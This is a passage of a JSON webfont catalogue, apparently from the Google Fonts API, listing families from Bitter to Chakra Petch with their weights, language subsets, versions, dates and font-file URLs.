        "900": "http://fonts.gstatic.com/s/biryani/v6/hv-TlzNxIFoO84Yddcg0GTBSU-J-RxQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bitter",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v16",
      "lastModified": "2020-07-29",
      "files": {
        "100": "http://fonts.gstatic.com/s/bitter/v16/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8fbeCL_EXFh2reU.ttf",
        "200": "http://fonts.gstatic.com/s/bitter/v16/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8XbfCL_EXFh2reU.ttf",
        "300": "http://fonts.gstatic.com/s/bitter/v16/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8ajfCL_EXFh2reU.ttf",
        "regular": "http://fonts.gstatic.com/s/bitter/v16/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8fbfCL_EXFh2reU.ttf",
        "500": "http://fonts.gstatic.com/s/bitter/v16/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8cTfCL_EXFh2reU.ttf",
        "600": "http://fonts.gstatic.com/s/bitter/v16/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8SjYCL_EXFh2reU.ttf",
        "700": "http://fonts.gstatic.com/s/bitter/v16/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8RHYCL_EXFh2reU.ttf",
        "800": "http://fonts.gstatic.com/s/bitter/v16/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8XbYCL_EXFh2reU.ttf",
        "900": "http://fonts.gstatic.com/s/bitter/v16/raxhHiqOu8IVPmnRc6SY1KXhnF_Y8V_YCL_EXFh2reU.ttf",
        "100italic": "http://fonts.gstatic.com/s/bitter/v16/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6c4P3OWHpzveWxBw.ttf",
        "200italic": "http://fonts.gstatic.com/s/bitter/v16/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cYPzOWHpzveWxBw.ttf",
        "300italic": "http://fonts.gstatic.com/s/bitter/v16/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cvvzOWHpzveWxBw.ttf",
        "italic": "http://fonts.gstatic.com/s/bitter/v16/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6c4PzOWHpzveWxBw.ttf",
        "500italic": "http://fonts.gstatic.com/s/bitter/v16/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6c0vzOWHpzveWxBw.ttf",
        "600italic": "http://fonts.gstatic.com/s/bitter/v16/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cPvvOWHpzveWxBw.ttf",
        "700italic": "http://fonts.gstatic.com/s/bitter/v16/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cB_vOWHpzveWxBw.ttf",
        "800italic": "http://fonts.gstatic.com/s/bitter/v16/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cYPvOWHpzveWxBw.ttf",
        "900italic": "http://fonts.gstatic.com/s/bitter/v16/raxjHiqOu8IVPmn7epZnDMyKBvHf5D6cSfvOWHpzveWxBw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Black And White Picture",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/blackandwhitepicture/v8/TwMe-JAERlQd3ooUHBUXGmrmioKjjnRSFO-NqI5HbcMi-yWY.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Black Han Sans",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/blackhansans/v8/ea8Aad44WunzF9a-dL6toA8r8nqVIXSkH-Hc.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Black Ops One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/blackopsone/v12/qWcsB6-ypo7xBdr6Xshe96H3WDzRtjkho4M.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Blinker",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v4",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/blinker/v4/cIf_MaFatEE-VTaP_E2hZEsCkIt9QQ.ttf",
        "200": "http://fonts.gstatic.com/s/blinker/v4/cIf4MaFatEE-VTaP_OGARGEsnIJkWL4.ttf",
        "300": "http://fonts.gstatic.com/s/blinker/v4/cIf4MaFatEE-VTaP_IWDRGEsnIJkWL4.ttf",
        "regular": "http://fonts.gstatic.com/s/blinker/v4/cIf9MaFatEE-VTaPxCmrYGkHgIs.ttf",
        "600": "http://fonts.gstatic.com/s/blinker/v4/cIf4MaFatEE-VTaP_PGFRGEsnIJkWL4.ttf",
        "700": "http://fonts.gstatic.com/s/blinker/v4/cIf4MaFatEE-VTaP_JWERGEsnIJkWL4.ttf",
        "800": "http://fonts.gstatic.com/s/blinker/v4/cIf4MaFatEE-VTaP_ImHRGEsnIJkWL4.ttf",
        "900": "http://fonts.gstatic.com/s/blinker/v4/cIf4MaFatEE-VTaP_K2GRGEsnIJkWL4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bokor",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bokor/v13/m8JcjfpeeaqTiR2WdInbcaxE.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bonbon",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bonbon/v12/0FlVVPeVlFec4ee_cDEAbQY5-A.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Boogaloo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/boogaloo/v12/kmK-Zq45GAvOdnaW6x1F_SrQo_1K.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bowlby One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bowlbyone/v12/taiPGmVuC4y96PFeqp8smo6C_Z0wcK4.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bowlby One SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bowlbyonesc/v12/DtVlJxerQqQm37tzN3wMug9Pzgj8owhNjuE.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Brawler",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/brawler/v11/xn7gYHE3xXewAscGsgC7S9XdZN8.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bree Serif",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/breeserif/v10/4UaHrEJCrhhnVA3DgluAx63j5pN1MwI.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bubblegum Sans",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bubblegumsans/v9/AYCSpXb_Z9EORv1M5QTjEzMEtdaHzoPPb7R4.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bubbler One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bubblerone/v9/f0Xy0eqj68ppQV9KBLmAouHH26MPePkt.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Buda",
      "variants": [
        "300"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/buda/v11/GFDqWAN8mnyIJSSrG7UBr7pZKA0.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Buenard",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/buenard/v12/OD5DuM6Cyma8FnnsPzf9qGi9HL4.ttf",
        "700": "http://fonts.gstatic.com/s/buenard/v12/OD5GuM6Cyma8FnnsB4vSjGCWALepwss.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bungee",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bungee/v6/N0bU2SZBIuF2PU_ECn50Kd_PmA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bungee Hairline",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bungeehairline/v6/snfys0G548t04270a_ljTLUVrv-7YB2dQ5ZPqQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bungee Inline",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bungeeinline/v6/Gg8zN58UcgnlCweMrih332VuDGJ1-FEglsc.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bungee Outline",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bungeeoutline/v6/_6_mEDvmVP24UvU2MyiGDslL3Qg3YhJqPXxo.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Bungee Shade",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/bungeeshade/v6/DtVkJxarWL0t2KdzK3oI_jks7iLSrwFUlw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Butcherman",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/butcherman/v12/2EbiL-thF0loflXUBOdb1zWzq_5uT84.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Butterfly Kids",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/butterflykids/v9/ll8lK2CWTjuqAsXDqlnIbMNs5S4arxFrAX1D.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cabin",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "italic",
        "500italic",
        "600italic",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v17",
      "lastModified": "2020-09-29",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cabin/v17/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkV2EL7Gvxm7rE_s.ttf",
        "500": "http://fonts.gstatic.com/s/cabin/v17/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkW-EL7Gvxm7rE_s.ttf",
        "600": "http://fonts.gstatic.com/s/cabin/v17/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkYODL7Gvxm7rE_s.ttf",
        "700": "http://fonts.gstatic.com/s/cabin/v17/u-4X0qWljRw-PfU81xCKCpdpbgZJl6XFpfEd7eA9BIxxkbqDL7Gvxm7rE_s.ttf",
        "italic": "http://fonts.gstatic.com/s/cabin/v17/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXHx_KlwkzuA_u1Bg.ttf",
        "500italic": "http://fonts.gstatic.com/s/cabin/v17/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXH9fKlwkzuA_u1Bg.ttf",
        "600italic": "http://fonts.gstatic.com/s/cabin/v17/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXHGfWlwkzuA_u1Bg.ttf",
        "700italic": "http://fonts.gstatic.com/s/cabin/v17/u-4V0qWljRw-Pd815fNqc8T_wAFcX-c37MPiNYlWniJ2hJXHIPWlwkzuA_u1Bg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cabin Condensed",
      "variants": [
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v14",
      "lastModified": "2020-09-29",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cabincondensed/v14/nwpMtK6mNhBK2err_hqkYhHRqmwaYOjZ5HZl8Q.ttf",
        "500": "http://fonts.gstatic.com/s/cabincondensed/v14/nwpJtK6mNhBK2err_hqkYhHRqmwilMH97F15-K1oqQ.ttf",
        "600": "http://fonts.gstatic.com/s/cabincondensed/v14/nwpJtK6mNhBK2err_hqkYhHRqmwiuMb97F15-K1oqQ.ttf",
        "700": "http://fonts.gstatic.com/s/cabincondensed/v14/nwpJtK6mNhBK2err_hqkYhHRqmwi3Mf97F15-K1oqQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cabin Sketch",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v14",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cabinsketch/v14/QGYpz_kZZAGCONcK2A4bGOjMn9JM6fnuKg.ttf",
        "700": "http://fonts.gstatic.com/s/cabinsketch/v14/QGY2z_kZZAGCONcK2A4bGOj0I_1o4dLyI4CMFw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Caesar Dressing",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/caesardressing/v9/yYLx0hLa3vawqtwdswbotmK4vrR3cbb6LZttyg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cagliostro",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cagliostro/v9/ZgNWjP5HM73BV5amnX-TjGXEM4COoE4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cairo",
      "variants": [
        "200",
        "300",
        "regular",
        "600",
        "700",
        "900"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-25",
      "files": {
        "200": "http://fonts.gstatic.com/s/cairo/v9/SLXLc1nY6Hkvalrub76M7dd8aGZk.ttf",
        "300": "http://fonts.gstatic.com/s/cairo/v9/SLXLc1nY6HkvalqKbL6M7dd8aGZk.ttf",
        "regular": "http://fonts.gstatic.com/s/cairo/v9/SLXGc1nY6HkvamImRJqExst1.ttf",
        "600": "http://fonts.gstatic.com/s/cairo/v9/SLXLc1nY6Hkvalr-ar6M7dd8aGZk.ttf",
        "700": "http://fonts.gstatic.com/s/cairo/v9/SLXLc1nY6Hkvalqaa76M7dd8aGZk.ttf",
        "900": "http://fonts.gstatic.com/s/cairo/v9/SLXLc1nY6Hkvalqiab6M7dd8aGZk.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Caladea",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/caladea/v2/kJEzBugZ7AAjhybUjR93-9IztOc.ttf",
        "italic": "http://fonts.gstatic.com/s/caladea/v2/kJExBugZ7AAjhybUvR19__A2pOdvDA.ttf",
        "700": "http://fonts.gstatic.com/s/caladea/v2/kJE2BugZ7AAjhybUtaNY39oYqO52FZ0.ttf",
        "700italic": "http://fonts.gstatic.com/s/caladea/v2/kJE0BugZ7AAjhybUvR1FQ98SrMxzBZ2lDA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Calistoga",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/calistoga/v2/6NUU8F2OJg6MeR7l4e0vtMYAwdRZfw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Calligraffitti",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/calligraffitti/v12/46k2lbT3XjDVqJw3DCmCFjE0vnFZM5ZBpYN-.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cambay",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cambay/v7/SLXJc1rY6H0_ZDsGbrSIz9JsaA.ttf",
        "italic": "http://fonts.gstatic.com/s/cambay/v7/SLXLc1rY6H0_ZDs2bL6M7dd8aGZk.ttf",
        "700": "http://fonts.gstatic.com/s/cambay/v7/SLXKc1rY6H0_ZDs-0pusx_lwYX99kA.ttf",
        "700italic": "http://fonts.gstatic.com/s/cambay/v7/SLXMc1rY6H0_ZDs2bIYwwvN0Q3ptkDMN.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cambo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cambo/v9/IFSqHeNEk8FJk416ok7xkPm8.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Candal",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/candal/v10/XoHn2YH6T7-t_8cNAR4Jt9Yxlw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cantarell",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cantarell/v10/B50NF7ZDq37KMUvlO01Ji6hqHK-CLA.ttf",
        "italic": "http://fonts.gstatic.com/s/cantarell/v10/B50LF7ZDq37KMUvlO015iaJuPqqSLJYf.ttf",
        "700": "http://fonts.gstatic.com/s/cantarell/v10/B50IF7ZDq37KMUvlO01xN4dOFISeJY8GgQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/cantarell/v10/B50WF7ZDq37KMUvlO015iZrSEY6aB4oWgWHB.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cantata One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cantataone/v10/PlI5Fl60Nb5obNzNe2jslVxEt8CwfGaD.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cantora One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cantoraone/v10/gyB4hws1JdgnKy56GB_JX6zdZ4vZVbgZ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Capriola",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/capriola/v8/wXKoE3YSppcvo1PDln_8L-AinG8y.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cardo",
      "variants": [
        "regular",
        "italic",
        "700"
      ],
      "subsets": [
        "greek",
        "greek-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v13",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cardo/v13/wlp_gwjKBV1pqiv_1oAZ2H5O.ttf",
        "italic": "http://fonts.gstatic.com/s/cardo/v13/wlpxgwjKBV1pqhv93IQ73W5OcCk.ttf",
        "700": "http://fonts.gstatic.com/s/cardo/v13/wlpygwjKBV1pqhND-aQR82JHaTBX.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Carme",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/carme/v11/ptRHTiWdbvZIDOjGxLNrxfbZ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Carrois Gothic",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/carroisgothic/v11/Z9XPDmFATg-N1PLtLOOxvIHl9ZmD3i7ajcJ-.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Carrois Gothic SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/carroisgothicsc/v10/ZgNJjOVHM6jfUZCmyUqT2A2HVKjc-28nNHabY4dN.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Carter One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/carterone/v12/q5uCsoe5IOB2-pXv9UcNIxR2hYxREMs.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Catamaran",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "tamil"
      ],
      "version": "v7",
      "lastModified": "2020-07-29",
      "files": {
        "100": "http://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjc1anXuluiLyw.ttf",
        "200": "http://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPPjd1anXuluiLyw.ttf",
        "300": "http://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPCbd1anXuluiLyw.ttf",
        "regular": "http://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjd1anXuluiLyw.ttf",
        "500": "http://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPErd1anXuluiLyw.ttf",
        "600": "http://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPKba1anXuluiLyw.ttf",
        "700": "http://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPJ_a1anXuluiLyw.ttf",
        "800": "http://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPPja1anXuluiLyw.ttf",
        "900": "http://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPNHa1anXuluiLyw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Caudex",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "greek",
        "greek-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/caudex/v10/esDQ311QOP6BJUrIyviAnb4eEw.ttf",
        "italic": "http://fonts.gstatic.com/s/caudex/v10/esDS311QOP6BJUr4yPKEv7sOE4in.ttf",
        "700": "http://fonts.gstatic.com/s/caudex/v10/esDT311QOP6BJUrwdteklZUCGpG-GQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/caudex/v10/esDV311QOP6BJUr4yMo4kJ8GOJSuGdLB.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Caveat",
      "variants": [
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-11-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/caveat/v9/WnznHAc5bAfYB2QRah7pcpNvOx-pjfJ9SIKjYBxPigs.ttf",
        "500": "http://fonts.gstatic.com/s/caveat/v9/WnznHAc5bAfYB2QRah7pcpNvOx-pjcB9SIKjYBxPigs.ttf",
        "600": "http://fonts.gstatic.com/s/caveat/v9/WnznHAc5bAfYB2QRah7pcpNvOx-pjSx6SIKjYBxPigs.ttf",
        "700": "http://fonts.gstatic.com/s/caveat/v9/WnznHAc5bAfYB2QRah7pcpNvOx-pjRV6SIKjYBxPigs.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Caveat Brush",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/caveatbrush/v6/EYq0maZfwr9S9-ETZc3fKXtMW7mT03pdQw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Cedarville Cursive",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cedarvillecursive/v12/yYL00g_a2veiudhUmxjo5VKkoqA-B_neJbBxw8BeTg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ceviche One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/cevicheone/v11/gyB4hws1IcA6JzR-GB_JX6zdZ4vZVbgZ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Chakra Petch",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/chakrapetch/v4/cIflMapbsEk7TDLdtEz1BwkeNIhFQJXE3AY00g.ttf",
